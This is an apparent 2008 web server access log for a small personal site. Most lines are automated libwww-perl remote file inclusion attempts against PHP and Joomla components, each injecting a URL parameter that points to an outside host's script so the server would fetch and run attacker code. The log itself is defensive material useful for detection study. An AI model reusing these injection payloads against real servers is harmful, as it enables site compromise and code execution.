198.208.159.17 - - [22/Jan/2008:04:00:43 -0800] "GET /bikes/dteel/Mining_Pick.jpg HTTP/1.1" 200 23376 "http://www.st-owners.com/forums/showthread.php?t=34378" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.6.20.143 - - [22/Jan/2008:04:02:37 -0800] "GET /funny/?S=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.72.117.141 - - [22/Jan/2008:04:04:24 -0800] "GET /logs/access_071212.log//administrator/components/com_jreactions/load.php?comPath=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.72.117.141 - - [22/Jan/2008:04:04:24 -0800] "GET //administrator/components/com_jreactions/load.php?comPath=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.72.117.141 - - [22/Jan/2008:04:04:24 -0800] "GET /logs//administrator/components/com_jreactions/load.php?comPath=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.72.117.141 - - [22/Jan/2008:04:05:18 -0800] "GET /logs/access_071225.log//administrator/components/com_jreactions/load.php?comPath=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:04:08:27 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:04:08:27 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:04:08:27 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:04:08:30 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
146.83.237.67 - - [22/Jan/2008:04:08:36 -0800] "GET /logs/access_071212.log//administrator/components/com_jreactions/load.php?comPath=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
146.83.237.67 - - [22/Jan/2008:04:08:40 -0800] "GET //administrator/components/com_jreactions/load.php?comPath=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
146.83.237.67 - - [22/Jan/2008:04:08:40 -0800] "GET /logs//administrator/components/com_jreactions/load.php?comPath=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:04:10:01 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.72.117.141 - - [22/Jan/2008:04:10:24 -0800] "GET //administrator/components/com_jreactions/load.php?comPath=http://www.n0n-clan.net/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.34 - - [22/Jan/2008:04:11:16 -0800] "GET /tmp/?S=A HTTP/1.0" 200 1322 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
146.83.237.67 - - [22/Jan/2008:04:11:50 -0800] "GET /logs/access_071225.log//administrator/components/com_jreactions/load.php?comPath=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
38.102.88.143 - - [22/Jan/2008:04:12:11 -0800] "GET /logs/access_071205.log//?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.130.79.43 - - [22/Jan/2008:04:12:28 -0800] "GET /logs/access_071228.log/myevent.php?myevent_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:04:12:41 -0800] "GET /logs/access.log//?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.106.20.28 - - [22/Jan/2008:04:12:44 -0800] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [22/Jan/2008:04:12:44 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [22/Jan/2008:04:12:44 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:04:12:49 -0800] "GET /logs//?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 200 31259 "-" "libwww-perl/5.803" "www.dmulk.com"
82.192.68.20 - - [22/Jan/2008:04:13:21 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://mtin.info/tiny_includes/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.20.21 - - [22/Jan/2008:04:13:37 -0800] "GET /megumi/Necklace/?N=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.93.194.218 - - [22/Jan/2008:04:13:40 -0800] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.194.218 - - [22/Jan/2008:04:13:40 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.194.218 - - [22/Jan/2008:04:13:40 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [22/Jan/2008:04:13:45 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [22/Jan/2008:04:13:45 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.88.242 - - [22/Jan/2008:04:15:39 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.169 - - [22/Jan/2008:04:16:28 -0800] "GET /funny/?M=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.85.100.45 - - [22/Jan/2008:04:16:29 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.141 - - [22/Jan/2008:04:17:00 -0800] "GET /logs/access_071212.log//administrator/components/com_jreactions/load.php?comPath=http://www.n0n-clan.net/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.72.117.141 - - [22/Jan/2008:04:17:00 -0800] "GET /logs//administrator/components/com_jreactions/load.php?comPath=http://www.n0n-clan.net/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.79 - - [22/Jan/2008:04:17:02 -0800] "GET /bikes/?S=A HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.119.17 - - [22/Jan/2008:04:17:45 -0800] "GET /logs/access_071230.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.119.17 - - [22/Jan/2008:04:17:46 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.119.17 - - [22/Jan/2008:04:17:58 -0800] "GET /logs/access_071230.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.119.17 - - [22/Jan/2008:04:17:59 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.72.117.141 - - [22/Jan/2008:04:18:12 -0800] "GET /logs/access_071225.log//administrator/components/com_jreactions/load.php?comPath=http://www.n0n-clan.net/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.20.28 - - [22/Jan/2008:04:18:19 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [22/Jan/2008:04:18:19 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [22/Jan/2008:04:18:20 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [22/Jan/2008:04:18:23 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [22/Jan/2008:04:18:23 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [22/Jan/2008:04:18:23 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [22/Jan/2008:04:18:24 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [22/Jan/2008:04:18:25 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [22/Jan/2008:04:18:25 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:04:19:36 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.20.28 - - [22/Jan/2008:04:19:52 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.50.26 - - [22/Jan/2008:04:20:04 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.209.207 - - [22/Jan/2008:04:20:15 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [22/Jan/2008:04:20:16 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:04:20:50 -0800] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:04:20:50 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:04:20:50 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:04:20:59 -0800] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:04:20:59 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:04:21:00 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:04:21:39 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:04:21:39 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [22/Jan/2008:04:22:47 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [22/Jan/2008:04:22:47 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [22/Jan/2008:04:22:48 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [22/Jan/2008:04:22:53 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [22/Jan/2008:04:22:53 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [22/Jan/2008:04:22:53 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.50.26 - - [22/Jan/2008:04:24:28 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.226.106 - - [22/Jan/2008:04:24:54 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.226.106 - - [22/Jan/2008:04:24:54 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.85.100.45 - - [22/Jan/2008:04:25:14 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.100.45 - - [22/Jan/2008:04:25:14 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.100.45 - - [22/Jan/2008:04:25:15 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.cosmosindoabadi.co.id/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [22/Jan/2008:04:26:26 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [22/Jan/2008:04:26:26 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:04:26:36 -0800] "GET /minamijewelry/html/bird.html HTTP/1.0" 200 20962 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:04:26:43 -0800] "GET /logs/access_071230.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:04:26:43 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:04:26:43 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:04:27:07 -0800] "GET /logs/access_071221.log//?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.119.17 - - [22/Jan/2008:04:29:19 -0800] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.50.26 - - [22/Jan/2008:04:29:55 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [22/Jan/2008:04:29:55 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.119.17 - - [22/Jan/2008:04:30:11 -0800] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:04:30:16 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:04:30:16 -0800] "GET /minamijewelry/html/terms.html HTTP/1.0" 200 13534 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:04:30:29 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.171.183 - - [22/Jan/2008:04:30:42 -0800] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.171.183 - - [22/Jan/2008:04:30:42 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.171.183 - - [22/Jan/2008:04:30:42 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:04:31:12 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mateus.t5.com.br/tool25.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
213.80.123.56 - - [22/Jan/2008:04:31:46 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [22/Jan/2008:04:31:46 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [22/Jan/2008:04:31:46 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.171.183 - - [22/Jan/2008:04:32:38 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.171.183 - - [22/Jan/2008:04:32:38 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.171.183 - - [22/Jan/2008:04:32:39 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.80.123.56 - - [22/Jan/2008:04:32:50 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.125.219 - - [22/Jan/2008:04:33:49 -0800] "GET /logs/access.log//includes/functions_portal.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.125.219 - - [22/Jan/2008:04:33:49 -0800] "GET //includes/functions_portal.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.125.219 - - [22/Jan/2008:04:33:50 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.74.175.5 - - [22/Jan/2008:04:34:14 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [22/Jan/2008:04:34:15 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.74.175.5 - - [22/Jan/2008:04:34:15 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:35:00 -0800] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:35:00 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:35:00 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:35:04 -0800] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:35:04 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [22/Jan/2008:04:35:04 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.musencia.com/main/administrator/components/com_phpshop/asc?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
